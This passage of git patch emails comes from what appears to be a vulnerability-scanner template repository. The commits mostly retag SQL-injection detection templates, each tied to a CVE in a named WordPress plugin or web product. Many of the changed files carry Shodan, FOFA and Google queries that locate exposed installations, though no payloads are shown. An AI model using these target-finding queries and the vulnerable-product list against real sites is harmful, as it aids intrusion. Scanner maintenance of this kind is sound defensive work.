type: status status: - - 200 \ No newline at end of file + - 200 From 69f9549b7a7a172ca875ce1578a6fbbb8ad87df2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 13 Oct 2024 19:35:03 +0530 Subject: [PATCH 060/218] added missing tech --- http/technologies/mirth-connect-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/mirth-connect-detect.yaml b/http/technologies/mirth-connect-detect.yaml index 8a2126e02c..e0e338e090 100644 --- a/http/technologies/mirth-connect-detect.yaml +++ b/http/technologies/mirth-connect-detect.yaml @@ -11,7 +11,7 @@ info: max-request: 1 product: mirth_connect shodan-query: title:"mirth connect administrator" - tags: mirth-connect + tags: mirth-connect,tech http: From 706995e187442be5d7aaadd6b9bcc8f6ef8652f1 Mon Sep 17 00:00:00 2001 From: ghost Date: Mon, 14 Oct 2024 00:23:37 +0000 Subject: [PATCH 061/218] =?UTF-8?q?chore:=20update=20WordPress=20Plugins?= =?UTF-8?q?=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- helpers/wordpress/plugins/maintenance.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/helpers/wordpress/plugins/maintenance.txt b/helpers/wordpress/plugins/maintenance.txt index a3b16e3a53..07c6b55998 100644 --- a/helpers/wordpress/plugins/maintenance.txt +++ b/helpers/wordpress/plugins/maintenance.txt @@ -1 +1 @@ -4.12 \ No newline at end of file +4.13 \ No newline at end of file From 3f531519cec5ba5b2410adeaa1960b03b92537f1 Mon Sep 17 00:00:00 2001 From: root <718701810@qq.com> Date: Mon, 14 Oct 2024 11:18:31 +0100 Subject: [PATCH 062/218] addtimebased --- dast/vulnerabilities/sqli/time-based-sqli.yaml | 2 +- http/cves/2015/CVE-2015-2196.yaml | 2 +- http/cves/2015/CVE-2015-4062.yaml | 2 +- http/cves/2015/CVE-2015-9323.yaml | 2 +- http/cves/2018/CVE-2018-16159.yaml | 2 +- http/cves/2018/CVE-2018-7282.yaml | 2 +- http/cves/2019/CVE-2019-7139.yaml | 2 +- http/cves/2020/CVE-2020-11530.yaml | 2 +- http/cves/2020/CVE-2020-17463.yaml | 2 +- http/cves/2020/CVE-2020-26248.yaml | 2 +- http/cves/2020/CVE-2020-27481.yaml | 2 +- http/cves/2021/CVE-2021-24340.yaml | 2 +- http/cves/2021/CVE-2021-24442.yaml | 2 +- http/cves/2021/CVE-2021-24554.yaml | 2 +- http/cves/2021/CVE-2021-24731.yaml | 2 +- http/cves/2021/CVE-2021-24762.yaml | 2 +- http/cves/2021/CVE-2021-24791.yaml | 2 +- http/cves/2021/CVE-2021-24827.yaml | 2 +- http/cves/2021/CVE-2021-24849.yaml | 2 +- http/cves/2021/CVE-2021-24862.yaml | 2 +- http/cves/2021/CVE-2021-24931.yaml | 2 +- http/cves/2021/CVE-2021-24943.yaml | 2 +- http/cves/2021/CVE-2021-24946.yaml | 2 +- http/cves/2021/CVE-2021-25114.yaml | 2 +- http/cves/2021/CVE-2021-25899.yaml | 2 +- http/cves/2021/CVE-2021-27314.yaml | 2 +- http/cves/2021/CVE-2021-27315.yaml | 2 +- http/cves/2021/CVE-2021-27316.yaml | 2 +- http/cves/2021/CVE-2021-27319.yaml | 2 +- http/cves/2021/CVE-2021-27320.yaml | 2 +- http/cves/2021/CVE-2021-3110.yaml | 2 +- http/cves/2021/CVE-2021-39165.yaml | 2 +- http/cves/2022/CVE-2022-0228.yaml | 2 +- http/cves/2022/CVE-2022-0349.yaml | 2 +- http/cves/2022/CVE-2022-0412.yaml | 2 +- http/cves/2022/CVE-2022-0651.yaml | 2 +- http/cves/2022/CVE-2022-0658.yaml | 2 +- http/cves/2022/CVE-2022-0693.yaml | 2 +- http/cves/2022/CVE-2022-0747.yaml | 2 +- http/cves/2022/CVE-2022-0760.yaml | 2 +- http/cves/2022/CVE-2022-0769.yaml | 2 +- http/cves/2022/CVE-2022-0773.yaml | 2 +- http/cves/2022/CVE-2022-0784.yaml | 2 +- http/cves/2022/CVE-2022-0785.yaml | 2 +- http/cves/2022/CVE-2022-0786.yaml | 2 +- http/cves/2022/CVE-2022-0787.yaml | 2 +- http/cves/2022/CVE-2022-0788.yaml | 2 +- http/cves/2022/CVE-2022-0826.yaml | 2 +- http/cves/2022/CVE-2022-0827.yaml | 2 +- http/cves/2022/CVE-2022-0846.yaml | 2 +- http/cves/2022/CVE-2022-0867.yaml | 2 +- http/cves/2022/CVE-2022-0948.yaml | 2 +- http/cves/2022/CVE-2022-0949.yaml | 2 +- http/cves/2022/CVE-2022-1013.yaml | 2 +- http/cves/2022/CVE-2022-1057.yaml | 2 +- http/cves/2022/CVE-2022-1768.yaml | 2 +- http/cves/2022/CVE-2022-1883.yaml | 2 +- http/cves/2022/CVE-2022-22897.yaml | 2 +- http/cves/2022/CVE-2022-24223.yaml | 2 +- http/cves/2022/CVE-2022-24265.yaml | 2 +- http/cves/2022/CVE-2022-24266.yaml | 2 +- http/cves/2022/CVE-2022-2467.yaml | 2 +- http/cves/2022/CVE-2022-25148.yaml | 2 +- http/cves/2022/CVE-2022-25149.yaml | 2 +- http/cves/2022/CVE-2022-27984.yaml | 2 +- http/cves/2022/CVE-2022-28032.yaml | 2 +- http/cves/2022/CVE-2022-3142.yaml | 2 +- http/cves/2022/CVE-2022-31499.yaml | 2 +- http/cves/2022/CVE-2022-31976.yaml | 2 +- http/cves/2022/CVE-2022-31977.yaml | 2 +- http/cves/2022/CVE-2022-31978.yaml | 2 +- http/cves/2022/CVE-2022-33965.yaml | 2 +- http/cves/2022/CVE-2022-3768.yaml | 2 +- http/cves/2022/CVE-2022-3800.yaml | 2 +- http/cves/2022/CVE-2022-40032.yaml | 2 +- http/cves/2022/CVE-2022-4049.yaml | 2 +- http/cves/2022/CVE-2022-4050.yaml | 2 +- http/cves/2022/CVE-2022-4059.yaml | 2 +- http/cves/2022/CVE-2022-4117.yaml | 2 +- http/cves/2022/CVE-2022-44290.yaml | 2 +- http/cves/2022/CVE-2022-44291.yaml | 2 +- http/cves/2022/CVE-2022-45805.yaml | 2 +- http/cves/2023/CVE-2023-0261.yaml | 2 +- http/cves/2023/CVE-2023-0600.yaml | 2 +- http/cves/2023/CVE-2023-0630.yaml | 2 +- http/cves/2023/CVE-2023-0900.yaml | 2 +- http/cves/2023/CVE-2023-1408.yaml | 2 +- http/cves/2023/CVE-2023-1730.yaml | 2 +- http/cves/2023/CVE-2023-2130.yaml | 2 +- http/cves/2023/CVE-2023-23488.yaml | 2 +- http/cves/2023/CVE-2023-23489.yaml | 2 +- http/cves/2023/CVE-2023-27032.yaml | 2 +- http/cves/2023/CVE-2023-27034.yaml | 2 +- http/cves/2023/CVE-2023-27847.yaml | 2 +- http/cves/2023/CVE-2023-28662.yaml | 2 +- http/cves/2023/CVE-2023-30150.yaml | 2 +- http/cves/2023/CVE-2023-3077.yaml | 2 +- http/cves/2023/CVE-2023-34751.yaml | 2 +- http/cves/2023/CVE-2023-34752.yaml | 2 +- http/cves/2023/CVE-2023-34753.yaml | 2 +- http/cves/2023/CVE-2023-34754.yaml | 2 +- http/cves/2023/CVE-2023-34755.yaml | 2 +- http/cves/2023/CVE-2023-34756.yaml | 2 +- http/cves/2023/CVE-2023-36284.yaml | 2 +- http/cves/2023/CVE-2023-39361.yaml | 2 +- http/cves/2023/CVE-2023-39650.yaml | 2 +- http/cves/2023/CVE-2023-39796.yaml | 2 +- http/cves/2023/CVE-2023-43374.yaml | 2 +- http/cves/2023/CVE-2023-45375.yaml | 2 +- http/cves/2023/CVE-2023-46347.yaml | 2 +- http/cves/2023/CVE-2023-48084.yaml | 2 +- http/cves/2023/CVE-2023-4974.yaml | 2 +- http/cves/2023/CVE-2023-6063.yaml | 2 +- http/cves/2023/CVE-2023-6567.yaml | 2 +- http/cves/2024/CVE-2024-1061.yaml | 2 +- http/cves/2024/CVE-2024-1071.yaml | 2 +- http/cves/2024/CVE-2024-1512.yaml | 2 +- http/cves/2024/CVE-2024-1698.yaml | 2 +- http/cves/2024/CVE-2024-2621.yaml | 2 +- http/cves/2024/CVE-2024-27956.yaml | 2 +- http/cves/2024/CVE-2024-2876.yaml | 2 +- http/cves/2024/CVE-2024-2879.yaml | 2 +- http/cves/2024/CVE-2024-3552.yaml | 2 +- http/cves/2024/CVE-2024-36412.yaml | 2 +- http/cves/2024/CVE-2024-36683.yaml | 2 +- http/cves/2024/CVE-2024-3922.yaml | 2 +- http/cves/2024/CVE-2024-4257.yaml | 2 +- http/cves/2024/CVE-2024-4295.yaml | 2 +- http/cves/2024/CVE-2024-43917.yaml | 2 +- http/cves/2024/CVE-2024-4443.yaml | 2 +- http/cves/2024/CVE-2024-5765.yaml | 2 +- http/cves/2024/CVE-2024-5975.yaml | 2 +- http/cves/2024/CVE-2024-6028.yaml | 2 +- http/cves/2024/CVE-2024-6159.yaml | 2 +- http/cves/2024/CVE-2024-6205.yaml | 2 +- http/cves/2024/CVE-2024-6924.yaml | 2 +- http/cves/2024/CVE-2024-6926.yaml | 2 +- http/cves/2024/CVE-2024-6928.yaml | 2 +- http/cves/2024/CVE-2024-7188.yaml | 2 +- http/cves/2024/CVE-2024-7854.yaml | 2 +- http/cves/2024/CVE-2024-8484.yaml | 2 +- http/cves/2024/CVE-2024-8503.yaml | 2 +- http/cves/2024/CVE-2024-8522.yaml | 2 +- http/cves/2024/CVE-2024-9465.yaml | 2 +- http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml | 2 +- http/vulnerabilities/other/applezeed-sqli.yaml | 4 ++-- http/vulnerabilities/other/azon-dominator-sqli.yaml | 2 +- http/vulnerabilities/other/csz-cms-sqli.yaml | 4 ++-- http/vulnerabilities/other/ecology-oa-file-sqli.yaml | 2 +- http/vulnerabilities/other/fumengyun-sqli.yaml | 2 +- http/vulnerabilities/other/groomify-sqli.yaml | 4 ++-- http/vulnerabilities/other/opencart-core-sqli.yaml | 2 +- http/vulnerabilities/other/pingsheng-electronic-sqli.yaml | 2 +- http/vulnerabilities/other/pmb-sqli.yaml | 2 +- http/vulnerabilities/other/readymade-unilevel-sqli.yaml | 2 +- http/vulnerabilities/other/sitemap-sql-injection.yaml | 2 +- http/vulnerabilities/other/stackposts-sqli.yaml | 2 +- .../prestashop/prestashop-apmarketplace-sqli.yaml | 2 +- http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml | 2 +- http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml | 4 ++-- .../wordpress/advanced-booking-calendar-sqli.yaml | 4 ++-- .../wordpress/leaguemanager-sql-injection.yaml | 4 ++-- http/vulnerabilities/wordpress/notificationx-sqli.yaml | 4 ++-- http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml | 4 ++-- .../wordpress/wp-autosuggest-sql-injection.yaml | 2 +- http/vulnerabilities/wordpress/wp-smart-manager-sqli.yaml | 4 ++-- http/vulnerabilities/wordpress/wp-statistics-sqli.yaml | 2 +- http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml | 4 ++-- http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml | 2 +- http/vulnerabilities/yonyou/yonyou-ufida-nc-cloud-sqli.yaml | 2 +- 170 files changed, 180 insertions(+), 180 deletions(-) diff --git a/dast/vulnerabilities/sqli/time-based-sqli.yaml b/dast/vulnerabilities/sqli/time-based-sqli.yaml index 3b7946edbf..e659b7f2d9 100644 --- a/dast/vulnerabilities/sqli/time-based-sqli.yaml +++ b/dast/vulnerabilities/sqli/time-based-sqli.yaml @@ -6,7 +6,7 @@ info: severity: critical description: | This Template detects time-based Blind SQL Injection vulnerability - tags: sqli,dast,time-based,blind + tags: time-based,sqli,dast,time-based,blind flow: http(1) && http(2) diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 7e901fa40c..20bae87ce5 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -28,7 +28,7 @@ info: vendor: web-dorado product: spider_calendar framework: wordpress - tags: cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado + tags: time-based,cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado http: - raw: diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index 0d48f5a430..2ff30e4f32 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -30,7 +30,7 @@ info: vendor: newstatpress_project product: newstatpress framework: wordpress - tags: cve2015,cve,authenticated,sqli,wp-plugin,newstatpress,packetstorm,wordpress,wp,newstatpress_project + tags: time-based,cve2015,cve,authenticated,sqli,wp-plugin,newstatpress,packetstorm,wordpress,wp,newstatpress_project http: - raw: diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml index e3d78373a4..17c3be3d27 100644 --- a/http/cves/2015/CVE-2015-9323.yaml +++ b/http/cves/2015/CVE-2015-9323.yaml @@ -29,7 +29,7 @@ info: vendor: duckdev product: 404_to_301 framework: wordpress - tags: cve2015,cve,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated,duckdev + tags: time-based,cve2015,cve,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated,duckdev http: - raw: diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 94f72485c7..e45a3367df 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -31,7 +31,7 @@ info: framework: wordpress shodan-query: http.html:"/wp-content/plugins/gift-voucher/" fofa-query: body="/wp-content/plugins/gift-voucher/" - tags: cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen + tags: time-based,cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen http: - raw: diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml index 5827e2264a..7a0be7e458 100644 --- a/http/cves/2018/CVE-2018-7282.yaml +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -31,7 +31,7 @@ info: fofa-query: title="printmonitor" google-query: intitle:"printmonitor" product": printmonitor - tags: cve2018,cve,sqli,printmonitor,unauth,titool + tags: time-based,cve2018,cve,sqli,printmonitor,unauth,titool variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/cves/2019/CVE-2019-7139.yaml b/http/cves/2019/CVE-2019-7139.yaml index 6d805e6ae3..83ee6bc127 100644 --- a/http/cves/2019/CVE-2019-7139.yaml +++ b/http/cves/2019/CVE-2019-7139.yaml @@ -32,7 +32,7 @@ info: - http.component:"Magento" - cpe:"cpe:2.3:a:magento:magento" - http.component:"magento" - tags: cve,cve2019,sqli,magento + tags: time-based,cve,cve2019,sqli,magento flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml index 563a6aea87..49e61d4230 100644 --- a/http/cves/2020/CVE-2020-11530.yaml +++ b/http/cves/2020/CVE-2020-11530.yaml @@ -30,7 +30,7 @@ info: vendor: idangero product: chop_slider framework: wordpress - tags: cve,cve2020,wpscan,seclists,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero + tags: time-based,cve,cve2020,wpscan,seclists,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero http: - raw: diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index be557f5a60..84344bbe03 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.title:"fuel cms" fofa-query: title="fuel cms" google-query: intitle:"fuel cms" - tags: cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio + tags: time-based,cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio http: - raw: diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml index 98be999570..3d08387878 100644 --- a/http/cves/2020/CVE-2020-26248.yaml +++ b/http/cves/2020/CVE-2020-26248.yaml @@ -29,7 +29,7 @@ info: vendor: prestashop product: productcomments framework: prestashop - tags: cve,cve2020,packetstorm,sqli,prestshop,prestashop + tags: time-based,cve,cve2020,packetstorm,sqli,prestshop,prestashop http: - raw: diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index d697b3fbac..43c0ae2c7f 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -27,7 +27,7 @@ info: vendor: goodlayers product: good_learning_management_system framework: wordpress - tags: cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress + tags: time-based,cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress http: - raw: diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index 39c1dd22aa..f1df9c40a3 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -30,7 +30,7 @@ info: fofa-query: body=/wp-content/plugins/wp-statistics/ publicwww-query: /wp-content/plugins/wp-statistics/ google-query: inurl:/wp-content/plugins/wp-statistics - tags: cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs + tags: time-based,cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs http: - raw: diff --git a/http/cves/2021/CVE-2021-24442.yaml b/http/cves/2021/CVE-2021-24442.yaml index 7c58ab2792..ab9b394ac2 100644 --- a/http/cves/2021/CVE-2021-24442.yaml +++ b/http/cves/2021/CVE-2021-24442.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/polls-widget/ fofa-query: body=/wp-content/plugins/polls-widget/ publicwww-query: "/wp-content/plugins/polls-widget/" - tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli,wpdevart + tags: time-based,wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli,wpdevart http: - raw: diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index 42fafa94e4..b805ade23f 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml @@ -30,7 +30,7 @@ info: vendor: freelancetoindia product: paytm-pay framework: wordpress - tags: cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia + tags: time-based,cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia http: - raw: diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml index b642376aba..ca38b8ab64 100644 --- a/http/cves/2021/CVE-2021-24731.yaml +++ b/http/cves/2021/CVE-2021-24731.yaml @@ -27,7 +27,7 @@ info: vendor: genetechsolutions product: pie_register framework: wordpress - tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth,genetechsolutions + tags: time-based,cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth,genetechsolutions http: - raw: diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml index 38901f4239..a71caf93c7 100644 --- a/http/cves/2021/CVE-2021-24762.yaml +++ b/http/cves/2021/CVE-2021-24762.yaml @@ -28,7 +28,7 @@ info: vendor: getperfectsurvey product: perfect_survey framework: wordpress - tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey + tags: time-based,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey http: - raw: diff --git a/http/cves/2021/CVE-2021-24791.yaml b/http/cves/2021/CVE-2021-24791.yaml index f883fd42cc..1f08bbcc55 100644 --- a/http/cves/2021/CVE-2021-24791.yaml +++ b/http/cves/2021/CVE-2021-24791.yaml @@ -26,7 +26,7 @@ info: product: header_footer_code_manager framework: wordpress google-query: inurl:"/wp-content/plugins/wp-custom-pages/" - tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress + tags: time-based,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress http: - raw: diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml index 7925cbc88c..fde59625e3 100644 --- a/http/cves/2021/CVE-2021-24827.yaml +++ b/http/cves/2021/CVE-2021-24827.yaml @@ -30,7 +30,7 @@ info: vendor: asgaros product: asgaros_forum framework: wordpress - tags: cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros + tags: time-based,cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros http: - raw: diff --git a/http/cves/2021/CVE-2021-24849.yaml b/http/cves/2021/CVE-2021-24849.yaml index 2eb2ddf359..2d72a46c4c 100644 --- a/http/cves/2021/CVE-2021-24849.yaml +++ b/http/cves/2021/CVE-2021-24849.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/wc-multivendor-marketplace fofa-query: body=/wp-content/plugins/wc-multivendor-marketplace publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace" - tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers + tags: time-based,wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index f9bb6eb8ce..ba6db346e0 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -29,7 +29,7 @@ info: vendor: metagauss product: registrationmagic framework: wordpress - tags: cve,cve2021,wpscan,wp-plugin,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm,metagauss + tags: time-based,cve,cve2021,wpscan,wp-plugin,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm,metagauss http: - raw: diff --git a/http/cves/2021/CVE-2021-24931.yaml b/http/cves/2021/CVE-2021-24931.yaml index 83aacd167d..819d02cb85 100644 --- a/http/cves/2021/CVE-2021-24931.yaml +++ b/http/cves/2021/CVE-2021-24931.yaml @@ -28,7 +28,7 @@ info: vendor: ays-pro product: secure_copy_content_protection_and_content_locking framework: wordpress - tags: cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro + tags: time-based,cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro http: - raw: diff --git a/http/cves/2021/CVE-2021-24943.yaml b/http/cves/2021/CVE-2021-24943.yaml index 8e3f4b39e3..ad8b050d79 100644 --- a/http/cves/2021/CVE-2021-24943.yaml +++ b/http/cves/2021/CVE-2021-24943.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/registrations-for-the-events-calendar/ fofa-query: body=/wp-content/plugins/registrations-for-the-events-calendar/ publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/" - tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp + tags: time-based,wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp variables: text: "{{rand_base(5)}}" diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index ebcb0c2ff1..d7b6faaf85 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -30,7 +30,7 @@ info: vendor: webnus product: modern_events_calendar_lite framework: wordpress - tags: cve2021,cve,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,modern-events-calendar-lite,wordpress,webnus + tags: time-based,cve2021,cve,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,modern-events-calendar-lite,wordpress,webnus http: - raw: diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index 2510917b72..b36b3d3c3a 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -34,7 +34,7 @@ info: fofa-query: body=/wp-content/plugins/paid-memberships-pro/ publicwww-query: /wp-content/plugins/paid-memberships-pro/ google-query: inurl:"/wp-content/plugins/paid-memberships-pro" - tags: cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios + tags: time-based,cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios http: - raw: diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index 045514b774..8c5121af45 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -31,7 +31,7 @@ info: - html:"AURALL" - http.html:"aurall" fofa-query: body="aurall" - tags: cve2021,cve,sqli,void,aurall + tags: time-based,cve2021,cve,sqli,void,aurall http: - raw: diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml index 597ac7088b..97ff095d00 100644 --- a/http/cves/2021/CVE-2021-27314.yaml +++ b/http/cves/2021/CVE-2021-27314.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project + tags: time-based,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index 29c3843bb7..3ae5a8dde8 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project + tags: time-based,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml index f88a3dea84..3d52672e27 100644 --- a/http/cves/2021/CVE-2021-27316.yaml +++ b/http/cves/2021/CVE-2021-27316.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project + tags: time-based,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml index adb48b1905..22fb0694ab 100644 --- a/http/cves/2021/CVE-2021-27319.yaml +++ b/http/cves/2021/CVE-2021-27319.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project + tags: time-based,cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml index fa759aecbd..e1e8dc5737 100644 --- a/http/cves/2021/CVE-2021-27320.yaml +++ b/http/cves/2021/CVE-2021-27320.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project + tags: time-based,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-3110.yaml b/http/cves/2021/CVE-2021-3110.yaml index 556fd5a61d..fff87abf57 100644 --- a/http/cves/2021/CVE-2021-3110.yaml +++ b/http/cves/2021/CVE-2021-3110.yaml @@ -30,7 +30,7 @@ info: vendor: prestashop product: prestashop shodan-query: cpe:"cpe:2.3:a:prestashop:prestashop" - tags: cve,cve2021,sqli,prestshop,edb,prestashop + tags: time-based,cve,cve2021,sqli,prestshop,edb,prestashop http: - raw: diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index 71a29b1fb2..b4c8ed01e2 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -31,7 +31,7 @@ info: product: cachet shodan-query: http.favicon.hash:-1606065523 fofa-query: icon_hash=-1606065523 - tags: cve,cve2021,cachet,sqli,chachethq + tags: time-based,cve,cve2021,cachet,sqli,chachethq http: - raw: diff --git a/http/cves/2022/CVE-2022-0228.yaml b/http/cves/2022/CVE-2022-0228.yaml index 6eff669250..f3d606df33 100644 --- a/http/cves/2022/CVE-2022-0228.yaml +++ b/http/cves/2022/CVE-2022-0228.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.html:/wp-content/plugins/popup-builder/ fofa-query: body=/wp-content/plugins/popup-builder/ publicwww-query: /wp-content/plugins/popup-builder/ - tags: cve2022,cve,wordpress,wp-plugin,wp,wpscan,popup-builder,sygnoos,sqli + tags: 